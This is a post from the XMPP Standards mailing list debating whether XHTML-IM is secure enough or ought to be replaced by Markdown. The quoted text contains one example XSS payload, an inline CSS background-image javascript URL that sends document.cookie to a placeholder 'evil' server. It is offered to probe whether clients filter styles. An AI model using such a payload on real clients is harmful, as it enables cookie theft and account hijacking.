Le jeudi 12 octobre 2017, 13:13:17 CEST Dave Cridland a écrit : > But out of curiosity, do you allow inline style in your uses of XHTML-IM?
yes > So can something like the following work: > > <p style='background-image: url(&dquot;javascript:new > Image().src='http://my.evil.server/?cookie=' + > encodeURI(document.cookie);&dquot;);'>Hello</p> no: styles are white listed and background-image is not accepted + values are parsed and url is not accepted either. > A solid CSP will block this for newer browsers, of course, and > background-image is a SHOULD NOT in XEP-0071 as well. But I'd be > surprised if many implementations are filtering CSS at the property > level. We do in SàT, and I hope we are not the only one. But again it's an implementation issue, not spec. > I'm depressingly well aware of the failure of Markdown to standardize > on a single dialect, but I'm also well aware that the state of the art > in HTML-based applications is to use simple Markdown rather than HTML > for any user entered rich text, because of the very high risk of > security problems. It totally make senses that Markdown is not being standardized, it's a writing syntax (as it name says), not a publishing one. While XHTML (and by extension XHTML-IM) is a publishing syntax, well defined and with a schema, Markdown is a really poor choice for publishing: there is no such thing as invalid Markdown, every text is a valid Mardown, but result will be different according to used rendering library. In addition it doesn't help with security (specially regarding that HTML can be embedded in Markdown). On the other hand it's a handy syntax to write (we implement it), and it's easily rendered to (X)HTML, so people can use it in clients without problem, I totally see the reason to use it for end-user, just not as a publishing way. > Honestly, I think we're trading years of insecurity for a little > incompatibility. Are all current implementation unfixed for years? Did they got report and didn't they fixed the issue? If so, I would see more the issue on dev side and I don't think changing syntax will help in any way. Security issues happen like every bug, but it's an implementation thing and must be fixed once reported. XHTML (and by extension XHTML-IM) is well defined, and we know how to represent it (the same XHTML-IM must give the same result everywhere), it well adapted to XMPP, it's already implemented everywhere and it's working. I really thing there is not reason to change but bringing troubles, and that we have many more important things to work on (having a working MIX, fixing Pubsub, encryption, etc). Cheers Goffi _______________________________________________ Standards mailing list Info: https://mail.jabber.org/mailman/listinfo/standards Unsubscribe: [email protected] _______________________________________________
